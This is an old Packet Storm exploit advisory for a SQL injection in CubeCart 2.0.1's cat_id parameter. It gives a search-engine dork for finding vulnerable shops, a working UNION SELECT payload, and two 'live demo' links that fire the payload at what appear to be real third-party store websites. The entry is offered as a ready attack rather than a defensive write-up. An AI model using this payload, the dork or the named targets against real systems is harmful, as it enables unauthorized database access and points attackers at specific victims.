cubecartcms-sql.txt

2008-10-12T00:00:00
ID PACKETSTORM:70845
Type packetstorm
Reporter swappie aka faithlove
Modified 2008-10-12T00:00:00

Description

                                        
                                            `  
;############################################################################   
# Greetings to --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - P4tr1ck #  
# and all darkc0de members #   
;############################################################################   
#   
# Author: swappie [aka] faithlove   
  
# Email : swappieakafaithlove@gmail.com  
#   
# Do researching and share!   
#   
;###############################################################   
#   
# Title: CubeCart CMS (Sql Injection)  
#  
# Vendor: http://www.cubecart.com/  
#   
#  
;############################################################################  
# #  
# Dork: inurl:"/shop/index.php?cat_id=" intitle:"powered by CubeCart" 2.0.1 #  
# #   
#############################################################################  
  
  
Here is the original info about the vuln:  
  
http://www.securiteam.com/unixfocus/6K00E0KBFE.html  
  
And I thought it would be a great idea to develop the bug.  
  
  
  
--POC: http://www.site.com/shop/index.php?cat_id=-1 and 1=2 union all select @@version,2,3,4,5,6,7,8--  
  
Live Demo:  
---------  
  
http://www.pv31.com/shop/index.php?cat_id=-1%20and%201=2%20union%20all%20select%20@@version,2,3,4,5,6,7,8--  
  
http://fatguysinc.com/shop/index.php?cat_id=-1%20and%201=2%20union%20all%20select%20@@version,2,3,4,5,6,7,8--  
  
  
  
  
###########################################################  
#  
# Exploit Developed on : 12 Oct.2008  
###########################################################  
`